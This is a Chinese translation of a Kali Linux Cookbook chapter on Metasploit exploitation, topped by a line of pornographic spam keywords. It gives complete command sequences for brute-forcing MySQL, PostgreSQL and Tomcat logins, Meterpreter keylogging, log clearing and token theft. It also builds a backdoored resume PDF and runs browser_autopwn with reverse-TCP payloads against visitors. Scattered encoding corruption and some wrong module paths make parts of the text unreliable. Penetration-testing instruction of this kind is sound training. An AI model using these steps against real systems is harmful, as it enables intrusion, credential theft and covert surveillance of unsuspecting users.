成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费

資訊專欄INFORMATION COLUMN

Kali Linux 秘籍 第六章 漏洞利用

gekylin / 3355人閱讀

摘要:這是執(zhí)行漏洞利用的語(yǔ)法。同時(shí)注意當(dāng)加載完成時(shí),會(huì)顯示可用的漏洞利用列表。為了展示可用于此次漏洞利用的選項(xiàng)列表,我們使用模式??梢怨芾砟愕臅?huì)話,而執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。殺掉受害者系統(tǒng)的指定進(jìn)程,使用語(yǔ)法。

第六章 漏洞利用

作者:Willie L. Pritchett, David De Smet

譯者:飛龍

協(xié)議:CC BY-NC-SA 4.0

簡(jiǎn)介

一旦我們完成了漏洞掃描步驟,我們就了解了必要的知識(shí)來(lái)嘗試?yán)媚繕?biāo)系統(tǒng)上的漏洞。這一章中,我們會(huì)使用不同的工具來(lái)操作,包括系統(tǒng)測(cè)試的瑞士軍刀 Metasploit。

6.1 安裝和配置 Metasploitable

這個(gè)秘籍中,我們會(huì)安裝、配置和啟動(dòng) Metasploitable 2。 Metasploitable 是基于 Linux 的操作系統(tǒng),擁有多種可被 Metasploit 攻擊的漏洞。它由 Rapid7 (Metasploit 框架的所有者)設(shè)計(jì)。Metasploitable 是個(gè)熟悉 Meterpreter 用法的極好方式。

準(zhǔn)備

為了執(zhí)行這個(gè)秘籍,我們需要下列東西:

互聯(lián)網(wǎng)連接

VirtualBox PC 上的可用空間

解壓縮工具(這里我們使用 Windows 上的 7-Zip)

操作步驟

讓我們開始下載 Metasploitable 2。最安全的選擇是從 SourceForge 獲取下載包:

從這個(gè)鏈接下載 Metasploitable 2:http://sourceforge.net/ proje...。

將文件包括到硬盤的某個(gè)位置。

解壓文件。

將文件夾內(nèi)容放到你儲(chǔ)存虛擬磁盤文件的位置。

打開 VirtualBox 并點(diǎn)擊New按鈕:

![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-1.jpg)

點(diǎn)擊Next。

![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-2.jpg)

輸入 Metasploitable 2 的名稱并將Operating System: 選擇為Linux,Version: 選項(xiàng)Ubuntu。像下面的截圖那樣點(diǎn)擊Next。

![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-3.jpg)

如果可用的話,選擇 512 MB,并點(diǎn)擊Next。

![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-4.jpg)

選項(xiàng)現(xiàn)有磁盤,并從你下載和保存 Metasploitable 2 文件夾的地方選擇 VDMK 文件。

![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-5.jpg)

你的虛擬磁盤窗口會(huì)像下面的截圖那樣。在這個(gè)示例中,我們完全不需要更新磁盤空間。這是因?yàn)槭褂?Metasploitable 的時(shí)候,你會(huì)攻擊這個(gè)系統(tǒng),而并不是將它用作操作系統(tǒng)。

![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-6.jpg)

點(diǎn)擊Create。

![](http://git.oschina.net/wizardforcel/kali-linux-cookbook-zh/raw/master/img/6-1-7.jpg)

通過(guò)點(diǎn)擊 Metasploitable 2 的名稱和Start按鈕來(lái)啟動(dòng)它。

工作原理

這個(gè)秘籍中,我們?cè)?Virtualbox 中配置了 Metasploitable 2。我們以從Sourceforge.net下載 Metasploitable 開始這個(gè)秘籍,之后我們配置了 VDMK 來(lái)在 VirtualBox 中運(yùn)行并以啟動(dòng)該系統(tǒng)結(jié)束。

6.2 掌握 Armitage,Metasploit 的圖形管理工具

新版本的 Metasploit 使用叫做 Armitage 的圖形化前端工具。理解 Armitage 非常重要,因?yàn)樗ㄟ^(guò)提供可視化的信息,使你對(duì) Metasploit 的使用變得簡(jiǎn)單。它封裝了 Metasploit 控制臺(tái),并且通過(guò)使用它的列表功能,你可以一次看到比 Metasploit 控制臺(tái)或 Meterpreter 會(huì)話更多的內(nèi)容。

準(zhǔn)備

需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。

操作步驟

讓我們開始操作 Armitage:

從桌面上訪問(wèn)Start | Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage

在 Armitage的登錄界面中,點(diǎn)擊Connect(連接)按鈕。

Armitage 可能需要一些時(shí)間來(lái)連接 Metasploit。當(dāng)它完成時(shí),你可能看見下面的提示窗口。不要驚慌,一旦 Armitage 能夠連接時(shí),它會(huì)消失的。在 Start Metaspoit?界面,點(diǎn)擊Yes

隨后你會(huì)看到 Armitage 的主窗口。我們現(xiàn)在討論主窗口的三個(gè)區(qū)域(標(biāo)記為ABC,在下面的截圖中)。

A:這個(gè)區(qū)域展示了預(yù)先配置的模塊。你可以通過(guò)模塊列表下面的搜索框來(lái)搜索。

B:這個(gè)區(qū)域展示了你的活動(dòng)目標(biāo),我們能夠利用它的漏洞。

C:這個(gè)區(qū)域展示了多個(gè) Metasploit 標(biāo)簽頁(yè)。它允許多個(gè) Meterpreter 或控制臺(tái)會(huì)話同時(shí)運(yùn)行和展示。

啟動(dòng) Armitage 的一個(gè)自動(dòng)化方式就是在終端窗口中鍵入下列命令。

armitage

另見

為了了解更多 Meterpreter 的信息,請(qǐng)見“掌握 Meterpreter”一節(jié)。

6.3 掌握 Metasploit 控制臺(tái)(MSFCONSOLE)

這個(gè)秘籍中,我們會(huì)研究 Metasploit 控制臺(tái)(MSFCONSOLE)。MSFCONSOLE主要用于管理 Metasploit 數(shù)據(jù)庫(kù),管理會(huì)話以及配置和啟動(dòng) Metasploit 模塊。本質(zhì)上,出于利用漏洞的目的,MSFCONSOLE 能夠讓你連接到主機(jī),便于你利用它的漏洞。

你可以使用以下命令來(lái)和控制臺(tái)交互:

help:這個(gè)命令允許你查看你嘗試運(yùn)行的命令行的幫助文檔。

use module:這個(gè)命令允許你開始配置所選擇的模塊。

set optionname module:這個(gè)命令允許你為指定的模塊配置不同的選項(xiàng)。

exploit:這個(gè)命令啟動(dòng)漏洞利用模塊。

run:這個(gè)命令啟動(dòng)非漏洞利用模塊。

search module:這個(gè)命令允許你搜索獨(dú)立模塊。

exit:這個(gè)命令允許你退出 MSFCONSOLE。

準(zhǔn)備

需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。

操作步驟

讓我們開始探索 MSFCONSOLE:

打開命令行。

通過(guò)下列命令啟動(dòng) MSFCONSOLE:

msfconsole

通過(guò)search命令搜索所有可用的 Linux 模塊。每次我們打算執(zhí)行操作時(shí),都搜索一遍模塊通常是個(gè)好主意。主要因?yàn)樵?Metasploit 的不同版本之間,模塊路徑可能發(fā)生改變。

search linux

使用 John the Ripper Linux 密碼破解模塊。

use auxiliary/analyzse/jtr_linux

通過(guò)下列命令展示該模塊的可用選項(xiàng)。

show options

既然我們列出了可以對(duì)這個(gè)模塊使用的選項(xiàng),我們可以使用set命令來(lái)設(shè)置獨(dú)立選項(xiàng)。讓我們?cè)O(shè)置JOHN_PATH選項(xiàng):

set JOHN_PATH /usr/share/metasploit-framework/data/john/wordlists/ password.lst

現(xiàn)在執(zhí)行漏洞利用,我們需要輸入exploit命令:

exploit

更多

一旦你通過(guò) MSFCONSOLE 獲得了主機(jī)的訪問(wèn),你需要使用 Meterpreter 來(lái)分發(fā)載荷。MSFCONSOLE 可以管理你的回話,而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。

6.4 掌握 Metasploit CLI(MSFCLI)

這個(gè)秘籍中,我們會(huì)探索 Metasploit CLI(MSFCLI)。Metasploit 需要接口來(lái)執(zhí)行它的任務(wù)。MSFCLI 就是這樣的接口。它是一個(gè)極好的接口,用于學(xué)習(xí) Metasploit ,或測(cè)試/編寫新的漏洞利用。它也可用于腳本的情況中,并且對(duì)任務(wù)使用基本的自動(dòng)化。

使用 MSFCLI 的一個(gè)主要問(wèn)題是,你只能夠一次打開一個(gè) shell。你也會(huì)注意到,當(dāng)我們探索一些命令的時(shí)候,它比 MSFCONSOLE 慢并且復(fù)雜。最后,你需要知道你打算利用的具體漏洞來(lái)使用 MSFCLI。這會(huì)使它對(duì)于滲透測(cè)試新手有些難以使用,他們并不熟悉 Metasploit 漏洞利用列表。

MSFCLI 的一些命令是:

msfcli:這會(huì)加載 MSFCLI 可訪問(wèn)的所有可用漏洞利用列表。

msfcli -h:顯示 MSFCLI 的幫助文檔。

msfcli [PATH TO EXPLOIT] [options = value]:這是執(zhí)行漏洞利用的語(yǔ)法。

準(zhǔn)備

需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。

操作步驟

讓我們開始探索 MSFCLI:

使用下列命令啟動(dòng) Metasploit CLI (MSFCLI)。請(qǐng)耐心等待,因?yàn)檫@可能花一些時(shí)間,取決于你的系統(tǒng)速度。同時(shí)注意當(dāng) MSFCLI 加載完成時(shí),會(huì)顯示可用的漏洞利用列表。

msfcli

顯示 MSFCLI 幫助文檔:

msfcli -h

出于我們的演示目的,我們會(huì)執(zhí)行圣誕樹掃描( Christmas Tree Scan)。我們會(huì)選擇選項(xiàng) A 來(lái)顯示模塊高級(jí)選項(xiàng)。

msfcli auxiliary/scanner/portscan/xmas A

更多圣誕樹掃描的信息,請(qǐng)見下面的 URL:http://en.wikipedia.org/wiki/...。

此外,你可以列出當(dāng)前模塊的概覽,通過(guò)使用S模式。概覽模式是一個(gè)極好方式,來(lái)查看可用于當(dāng)前嘗試執(zhí)行的漏洞利用的所有選項(xiàng)。許多選項(xiàng)都是可選的,但是一小部分通常是必須的,它們?cè)试S你設(shè)置嘗試?yán)媚膫€(gè)目標(biāo)或端口的漏洞。

msfcli auxiliary/scanner/portscan/xmas S

為了展示可用于此次漏洞利用的選項(xiàng)列表,我們使用O模式。選項(xiàng)使用中配置漏洞利用模塊的方式。每個(gè)利用模塊都用不同的選項(xiàng)集合(或者什么都沒(méi)有)。任何所需的選項(xiàng)必須在漏洞利用執(zhí)行之前設(shè)置。在下面的截圖中,你會(huì)注意到許多所需選項(xiàng)都設(shè)為默認(rèn)。如果你碰到了這種情況,你就不需要更新選項(xiàng)的值,除非你打算修改它。

msfcli auxiliary/scanner/portscan/xmas O

我們使用E模式來(lái)執(zhí)行漏洞利用。

msfcli auxiliary/scanner/portscan/xmas E

這里,我們使用了默認(rèn)選項(xiàng)。

工作原理

這個(gè)秘籍中,我們以啟動(dòng) MSFCLI 開始,之后搜索可用的模塊,并執(zhí)行該模塊。在搜索的過(guò)程中,我們選修了圣誕樹掃描模塊并復(fù)查了 MSFCLI 界面來(lái)查看模塊概覽和所有可用選項(xiàng)。在設(shè)置完所有選項(xiàng)之后,我們執(zhí)行了漏洞利用。

了解 Metasploit 框架分為三個(gè)不同的部分非常重要。這些部分是:

漏洞:這些都是弱點(diǎn),要么已知要么位置。它們包含在特定的應(yīng)用、阮家寶或協(xié)議中。在 Metasploit 中,漏洞按照分組,和漏洞利用列出,漏洞利用可以攻擊列在它們下面的漏洞。

漏洞利用:漏洞利用是用來(lái)利用所發(fā)現(xiàn)漏洞的模塊。

載荷:一旦成功執(zhí)行了漏洞利用,必須把載荷傳給被攻擊的機(jī)器,以便允許我們創(chuàng)建 shell,運(yùn)行各種命令,添加用戶以及其它。

一旦你通過(guò) MSFCONSOLE 獲得了主機(jī)的訪問(wèn),你需要使用 Meterpreter 來(lái)分發(fā)載荷。MSFCONSOLE 可以管理你的會(huì)話,而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。

6.5 掌握 Meterpreter

一旦你使用 Armitage,MSFCLI 或 MSFCONSOLE 獲得了主機(jī)的訪問(wèn)權(quán),你必須使用 Meterpreter 來(lái)傳遞你的載荷。MSFCONSOLE 可以管理你的會(huì)話,而 Meterpreter 執(zhí)行實(shí)際的載荷分發(fā)和漏洞利用工作。

一些用于 Meterpreter 的常用命令包括:

help:這個(gè)命令允許你瀏覽幫助文檔。

background:這個(gè)命令允許你在后臺(tái)運(yùn)行 Meterpreter 會(huì)話。這個(gè)命令也能為你帶回 MSF 提示符。

download:這個(gè)命令允許你從受害者機(jī)器中下載文件。

upload:這個(gè)命令允許你向受害者機(jī)器上傳文件。

execute:這個(gè)命令允許你在受害者機(jī)器上運(yùn)行命令。

shell:這個(gè)命令允許你在受害者機(jī)器上運(yùn)行 Windows shell 提示符(僅限于 Windows 主機(jī))。

session -i:這個(gè)命令允許你在會(huì)話之間切換。

準(zhǔn)備

需要滿足下列要求:

內(nèi)部網(wǎng)絡(luò)或互聯(lián)網(wǎng)的連接。

使用 Armitage,MSFCLI 或 MSFCONSOLE 由 Metasploit 創(chuàng)建好的,目標(biāo)系統(tǒng)的活動(dòng)會(huì)話。

操作步驟

讓我們打開 MSFCONSOLE 來(lái)開始:

首先我們以 MSFCONSOLE 中展示的活動(dòng)會(huì)話開始。

開始記錄目標(biāo)系統(tǒng)中用戶的擊鍵順序:

keyscan_start 

轉(zhuǎn)儲(chǔ)目標(biāo)系統(tǒng)中用戶的擊鍵順序。擊鍵順序會(huì)顯示在屏幕上:

keyscan_dump 

停止記錄目標(biāo)系統(tǒng)中用戶的擊鍵順序。

keyscan_stop 

刪除目標(biāo)系統(tǒng)中的文件。

del exploited.docx 

清除目標(biāo)系統(tǒng)中的事件日志。

clearav 

展示運(yùn)行進(jìn)程的列表。

ps

殺掉受害者系統(tǒng)的指定進(jìn)程,使用kill [pid]語(yǔ)法。

kill 6353

嘗試偷取目標(biāo)系統(tǒng)上的模擬令牌。

steal_token 

工作原理

我們以通過(guò) Armitage,MSFCLI 或 MSFCONSOLE 預(yù)先建立的 Meterpreter 會(huì)話來(lái)開始。之后我們?cè)谀繕?biāo)機(jī)器上運(yùn)行了多種命令。

更多

當(dāng)我們對(duì)基于 Linux 主機(jī)使用 Meterpreter 的時(shí)候,我們能夠在它上面運(yùn)行 Linux 命令,就像我們操作這臺(tái)機(jī)器那樣。

6.6 Metasploitable MySQL

這個(gè)秘籍中,我們會(huì)探索如何使用 Metasploit 來(lái)攻擊 MySQL 數(shù)據(jù)庫(kù)服務(wù)器,使用 MySQL 掃描器模塊。MySQL 是許多網(wǎng)站平臺(tái)的選擇,包括 Drupal 和 Wordpress,許多網(wǎng)站當(dāng)前正在使用 MySQL 數(shù)據(jù)庫(kù)服務(wù)器。這會(huì)使它們更容易成為 Metasploitable MySQL 攻擊的目標(biāo)。

準(zhǔn)備

需要滿足下列要求:

內(nèi)部網(wǎng)絡(luò)的連接。

運(yùn)行在滲透環(huán)境中的 Metasploitable 。

用于執(zhí)行字典攻擊的單詞列表。

操作步驟

讓我們通過(guò)打開終端窗口來(lái)開始 MySQL 攻擊:

打開終端窗口。

啟動(dòng) MSFCONSOLE。

msfconsole 

搜索可用的 MySQL 模塊。

msfconsole mysql

使用 MySQL 掃描器模塊。

use auxiliary/scanner/mysql/mysql_login

顯示模塊的可用選項(xiàng)。

show options

將 RHOST 設(shè)置為 Metasploitable 2 主機(jī)或目標(biāo)主機(jī)的地址。

set RHOST 192.168.10.111 

設(shè)置用戶名文件的位置。你可以選擇:

set user_file /root/Desktop/usernames.txt

設(shè)置密碼文件的位置。你可以選擇:

set pass_file /root/Desktop/passwords.txt

執(zhí)行漏洞利用:

Exploit

Metasploit 會(huì)嘗試輸入包含在兩個(gè)文件中的所有用戶名和密碼組合。找到生效的登錄和密碼組合旁邊的+符號(hào)就可以了。

工作原理

這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 來(lái)利用 Metasploitable 2 靶機(jī)上的 MySQL 漏洞。我們以啟動(dòng)控制臺(tái)并搜索所有已知的 MySQL 模塊來(lái)開始。在選擇 MySQL 登錄利用模塊之后,我們?cè)O(shè)置了選項(xiàng)并執(zhí)行了漏洞利用,這讓我們能夠爆破 MySQL 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 MySQL 數(shù)據(jù)庫(kù)。

更多

這個(gè)秘籍中,我們使用了自己生成的用戶名和密碼文件。有許多方法可以生成用戶名和密碼單詞列表,這些方法在第八章中涉及。

6.7 Metasploitable PostgreSQL

這個(gè)秘籍中,我們會(huì)探索如何使用 Metasploit 來(lái)攻擊 PostgreSQL 數(shù)據(jù)庫(kù)服務(wù)器,使用 PostgreSQL 掃描器模塊。PostgreSQL 被譽(yù)為全世界最先進(jìn)的開源數(shù)據(jù)庫(kù),許多愛(ài)好者聲稱它是企業(yè)級(jí)的數(shù)據(jù)庫(kù)。我們會(huì)使用 Metasploit 來(lái)爆破 PostgreSQL 登錄。

準(zhǔn)備

需要滿足下列要求:

內(nèi)部網(wǎng)絡(luò)的連接。

運(yùn)行在滲透環(huán)境中的 Metasploitable 。

用于執(zhí)行字典攻擊的單詞列表。

操作步驟

讓我們通過(guò)打開終端窗口來(lái)開始 PostgreSQL 攻擊:

打開終端窗口。

啟動(dòng) MSFCONSOLE。

msfconsole 

搜索可用的 PostgreSQL 模塊。

msfconsole postgresql

使用 PostgreSQL 掃描器模塊。

use auxiliary/scanner/mysql/postgres_login

顯示模塊的可用選項(xiàng)。

show options

將 RHOST 設(shè)置為 Metasploitable 2 主機(jī)或目標(biāo)主機(jī)的地址。

set RHOST 192.168.10.111 

設(shè)置用戶名文件的位置。你可以選擇:

set user_file /root/Desktop/usernames.txt

設(shè)置密碼文件的位置。你可以選擇:

set pass_file /root/Desktop/passwords.txt

執(zhí)行漏洞利用:

Exploit

Metasploit 會(huì)嘗試輸入包含在兩個(gè)文件中的所有用戶名和密碼組合。找到生效的登錄和密碼組合旁邊的+符號(hào)就可以了。

工作原理

這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 來(lái)利用 Metasploitable 2 靶機(jī)上的 PostgreSQL 漏洞。我們以啟動(dòng)控制臺(tái)并搜索所有已知的 PostgreSQL 模塊來(lái)開始。在選擇 PostgreSQL 登錄利用模塊之后,我們?cè)O(shè)置了選項(xiàng)并執(zhí)行了漏洞利用,這讓我們能夠爆破 PostgreSQL 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 PostgreSQL 數(shù)據(jù)庫(kù)。之后找到生效的登錄和密碼組合旁邊的+符號(hào)就可以了。

更多

這個(gè)秘籍中,我們使用了默認(rèn)的 PostgreSQL 用戶名和密碼文件。然而我們也可以創(chuàng)建自己的文件。有許多方法可以生成用戶名和密碼單詞列表,這些方法在第八章中涉及。

6.8 Metasploitable Tomcat

這個(gè)秘籍中,我們會(huì)探索如何使用 Metasploit 攻擊 Tomcat 服務(wù)器,使用 Tomcat Manager Login 模塊。Tomcat,或 Apache Tomcat,是開源的 Web 服務(wù)器,和 Servlet 容器,用于運(yùn)行 Java Servt 和 JSP。Tomcat 服務(wù)器純粹使用 Java 編寫。我們會(huì)使用 Metasploit 來(lái)爆破 Tomcat 的登錄。

準(zhǔn)備

需要滿足下列要求:

內(nèi)部網(wǎng)絡(luò)的連接。

運(yùn)行在滲透環(huán)境中的 Metasploitable 。

用于執(zhí)行字典攻擊的單詞列表。

操作步驟

讓我們通過(guò)打開終端窗口來(lái)開始這個(gè)秘籍:

打開終端窗口。

啟動(dòng) MSFCONSOLE。

msfconsole 

搜索可用的 Tomcat 模塊。

msfconsole tomcat

使用 Tomcat Application Manager Login Utility。

use auxiliary/scanner/http/tomcat_mgr_login 

顯示模塊的可用選項(xiàng)。

show options

要注意我們有很多設(shè)置為“是”的項(xiàng)目,它們都是必須的。我們使用它們的默認(rèn)值。

設(shè)置Pass_File

PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt

設(shè)置Pass_File

USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt

設(shè)置目標(biāo)的RHOST,這里我們選擇我們的 Metasploitable 2 主機(jī):

set RHOSTS 192.168.10.111

RPORT設(shè)置為 8180:

set RPORT 8180

執(zhí)行漏洞利用:

Exploit

工作原理

這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 來(lái)利用 Metasploitable 2 靶機(jī)上的 Tomcat 漏洞。我們以啟動(dòng)控制臺(tái)并搜索所有已知的 Tomcat 模塊來(lái)開始。在選擇 Tomcat 登錄利用模塊之后,我們?cè)O(shè)置了選項(xiàng)并執(zhí)行了漏洞利用,這讓我們能夠爆破 Tomcat 登錄。Metasploit 使用提供的用戶名和密碼文件。并嘗試爆破 Tomcat 數(shù)據(jù)庫(kù)。之后找到生效的登錄和密碼組合旁邊的+符號(hào)就可以了。

6.9 Metasploitable PDF

這個(gè)秘籍中,我們會(huì)探索如何使用 Metasploit 來(lái)執(zhí)行攻擊,使用 Adobe PDF 內(nèi)嵌模塊來(lái)利用 PDF 文檔漏洞。Adobe PDF 是文檔傳輸?shù)臉?biāo)準(zhǔn)。由于它的廣泛使用,尤其是由于它的商業(yè)用途,我們會(huì)通過(guò)讓用戶認(rèn)為他們打開了來(lái)自求職崗位的正常 PDF 文檔來(lái)攻擊用戶的機(jī)器。

準(zhǔn)備

需要滿足下列要求:

內(nèi)部網(wǎng)絡(luò)的連接。

運(yùn)行在滲透環(huán)境中的 Metasploitable 。

用于執(zhí)行字典攻擊的單詞列表。

操作步驟

讓我們通過(guò)打開終端窗口來(lái)開始這個(gè)秘籍:

打開終端窗口。

啟動(dòng) MSFCONSOLE。

msfconsole 

搜索可用的 PDF 模塊。

msfconsole pdf

使用 PDF 內(nèi)嵌模塊:

use exploit/windows/fileformat/adobe_pdf_embedded_exe 

顯示模塊的可用選項(xiàng)。

show options

設(shè)置我們想要生成的 PDF 文件名稱:

set FILENAME evildocument.pdf

設(shè)置 INFILENAME 選項(xiàng)。它是你打算使用的 PDF 文件的位置。這里,我使用桌面上的簡(jiǎn)歷。

set INFILENAME /root/Desktop/willie.pdf

要注意,這個(gè)模塊的所有選項(xiàng)都是可選的,除了INFILENAME

執(zhí)行漏洞利用:

Exploit

工作原理

這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 創(chuàng)建了包含 Meterpreter 后門的 PDF 文件。我們以啟動(dòng)控制臺(tái)并搜索所有可用的 PDF 漏洞來(lái)開始。在選擇 PDF 內(nèi)嵌模塊之后,我們?cè)O(shè)置選項(xiàng)并執(zhí)行漏洞利用,這讓我們?cè)谡5?PDF 中埋下后門程序。Metasploit 會(huì)生成帶有 Windows 反向 TCP 載荷的 PDF。當(dāng)你的目標(biāo)打開 PDF 文件時(shí),Meterpreter 會(huì)開啟答復(fù)并激活會(huì)話。

6.10 實(shí)現(xiàn) browser_autopwn

瀏覽器 Autopwn 是 Metasploit 提供的輔助模塊,在受害者訪問(wèn)網(wǎng)頁(yè)時(shí),讓你能夠自動(dòng)化對(duì)它們的攻擊。瀏覽器 Autopwn 在攻擊之前指定客戶端的指紋識(shí)別,也就是說(shuō)他不會(huì)對(duì) IE 7 嘗試?yán)?Firefox 的漏洞?;谒臑g覽器判斷,它決定最適于實(shí)施哪個(gè)漏洞利用。

準(zhǔn)備

需要互聯(lián)網(wǎng)或內(nèi)部網(wǎng)絡(luò)的連接。

操作步驟

讓我們通過(guò)打開終端窗口來(lái)開始這個(gè)秘籍:

打開終端窗口。

啟動(dòng) MSFCONSOLE:

msfconsole 

搜索可用的 autopwn 模塊。

msfconsole autopwn

使用 browser_autopwn 模塊:

Use auxiliary/server/browser_autopwn

設(shè)置我們的載荷,這里我們使用 Windows 反向 TCP:

set payload windows/meterpreter/reverse_tcp 

顯示可用于該載荷類型的選項(xiàng)。

show options

設(shè)置反向連接所使用的 IP。這里,該 PC 的 IP 地址為 192.168.10.109

set LHOST 192.168.10.109

下面,我們打算設(shè)置 URIPATH,這里我們使用"filetypes"(帶引號(hào)):

set URIPATH "filetypes" 

最后,我們執(zhí)行漏洞利用:

exploit

Metasploit 會(huì)在 IP 地址 http://[Provided IP Address]:... 處執(zhí)行漏洞利用。

當(dāng)訪問(wèn)者訪問(wèn)這個(gè)地址時(shí),browser_autopwn模塊嘗試連接用戶的機(jī)器來(lái)建立遠(yuǎn)程會(huì)話。如果成功的話,Meterpreter 會(huì)確認(rèn)這個(gè)會(huì)話。使用會(huì)話命令來(lái)激活它:

session –I 1

為了顯示我們可以使用的 Meterpreter 命令列表,輸入help

help

會(huì)顯示可用命令的列表。這里,我們啟動(dòng)擊鍵順序掃描:

keyscan_start 

為了得到受害者機(jī)器上的擊鍵順序,我們鍵入keyscan_start命令:

keyscan_dump

工作原理

這個(gè)秘籍中,我們使用 Metasploit 的 MSFCONSOLE 來(lái)執(zhí)行 browser_autopwn 漏洞利用。我們以啟動(dòng)控制臺(tái)并搜索所有已知的autopwn模塊開始。在喧囂autopwn模塊之后,我們將載荷設(shè)置為windows_reverse_tcp。這允許我們?cè)诶贸晒r(shí)得到返回的鏈接。一旦受害者訪問(wèn)了我們的網(wǎng)頁(yè),漏洞利用就成功了,我們就能得到 Meterpreter 活動(dòng)會(huì)話。

文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請(qǐng)注明本文地址:http://systransis.cn/yun/11212.html

相關(guān)文章

  • Kali Linux 秘籍 第五章 漏洞評(píng)估

    摘要:第五章漏洞評(píng)估作者譯者飛龍協(xié)議簡(jiǎn)介掃描和識(shí)別目標(biāo)的漏洞通常被滲透測(cè)試者看做無(wú)聊的任務(wù)之一。家庭版的有效許可證。在標(biāo)簽頁(yè)中,選擇并選擇下列特定的漏洞。。漏洞會(huì)詳細(xì)列出。發(fā)現(xiàn)特定的漏洞在這個(gè)秘籍中,我們會(huì)使用探索如何發(fā)現(xiàn)特定漏洞。 第五章 漏洞評(píng)估 作者:Willie L. Pritchett, David De Smet 譯者:飛龍 協(xié)議:CC BY-NC-SA 4.0 簡(jiǎn)介 掃描和...

    csRyan 評(píng)論0 收藏0
  • Kali Linux 秘籍 第三章 高級(jí)測(cè)試環(huán)境

    摘要:第三章高級(jí)測(cè)試環(huán)境作者譯者飛龍協(xié)議簡(jiǎn)介既然我們已經(jīng)了解了所包含的工具,現(xiàn)在我們要調(diào)查一些真實(shí)世界的場(chǎng)景。下載靶機(jī)到目前為止,以及可見的未來(lái)中,微軟的系統(tǒng)都是許多個(gè)人和企業(yè)所選的操作系統(tǒng)。 第三章 高級(jí)測(cè)試環(huán)境 作者:Willie L. Pritchett, David De Smet 譯者:飛龍 協(xié)議:CC BY-NC-SA 4.0 簡(jiǎn)介 既然我們已經(jīng)了解了 Kali Linux ...

    hiyang 評(píng)論0 收藏0

發(fā)表評(píng)論

0條評(píng)論

最新活動(dòng)
閱讀需要支付1元查看
<